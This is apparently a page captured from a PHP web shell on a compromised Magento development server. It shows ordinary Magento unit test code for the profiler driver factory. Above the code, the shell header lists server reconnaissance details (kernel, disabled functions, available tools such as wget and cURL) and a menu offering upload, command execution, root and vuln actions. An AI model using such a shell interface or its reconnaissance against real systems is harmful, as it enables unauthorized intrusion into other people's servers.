Kernel : Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
Disable function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Safe mode : OFF
Host : diestoffstrasse.com | Server ip : 127.0.0.1 | Your ip : 127.0.0.1 | Time @ Server : 24 Aug 2025 15:15:03
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/dev2.destoffenstraat.com/vendor-1/magento/framework/Profiler/Test/Unit/Driver/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/dev2.destoffenstraat.com/vendor-1/magento/framework/Profiler/Test/Unit/Driver/FactoryTest.php

<?php declare(strict_types=1); /** * Test class for \Magento\Framework\Profiler\Driver\Factory * * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Profiler\Test\Unit\Driver; use Magento\Framework\Profiler\Driver\Factory; use Magento\Framework\Profiler\DriverInterface; use PHPUnit\Framework\TestCase; class FactoryTest extends TestCase { /** * @var Factory */ protected $_factory; /** * @var string */ protected $_defaultDriverPrefix = 'Magento_Framework_Profiler_Driver_Test_'; /** * @var string */ protected $_defaultDriverType = 'default'; protected function setUp(): void { $this->_factory = new Factory( $this->_defaultDriverPrefix, $this->_defaultDriverType ); } public function testConstructor() { $this->markTestSkipped('Skipped in #27500 due to testing protected/private methods and properties'); $this->assertAttributeEquals($this->_defaultDriverPrefix, '_defaultDriverPrefix', $this->_factory); $this->assertAttributeEquals($this->_defaultDriverType, '_defaultDriverType', $this->_factory); } public function testDefaultConstructor() { $this->markTestSkipped('Skipped in #27500 due to testing protected/private methods and properties'); $factory = new Factory(); $this->assertAttributeNotEmpty('_defaultDriverPrefix', $factory); $this->assertAttributeNotEmpty('_defaultDriverType', $factory); } /** * @dataProvider createDataProvider * @param array $config * @param string $expectedClass */ public function testCreate($config, $expectedClass) { $driver = $this->_factory->create($config); $this->assertInstanceOf($expectedClass, $driver); $this->assertInstanceOf(DriverInterface::class, $driver); } /** * @return array */ public function createDataProvider() { $defaultDriverClass = $this->getMockClass( DriverInterface::class, [], [], 'Magento_Framework_Profiler_Driver_Test_Default' ); $testDriverClass = $this->getMockClass( DriverInterface::class, [], [], 'Magento_Framework_Profiler_Driver_Test_Test' ); return [ 'Prefix and concrete type' => [['type' => 'test'], $testDriverClass], 'Prefix and default type' => [[], $defaultDriverClass], 'Concrete class' => [['type' => $testDriverClass], $testDriverClass] ]; } public function testCreateUndefinedClass() { $this->expectException('InvalidArgumentException'); $this->expectExceptionMessage( 'Cannot create profiler driver, class "Magento_Framework_Profiler_Driver_Test_Baz" doesn\'t exist.' ); $this->_factory->create(['type' => 'baz']); } public function testCreateInvalidClass() { $this->expectException('InvalidArgumentException'); $this->expectExceptionMessage( 'Driver class "stdClass" must implement \Magento\Framework\Profiler\DriverInterface.' ); $this->_factory->create(['type' => 'stdClass']); } }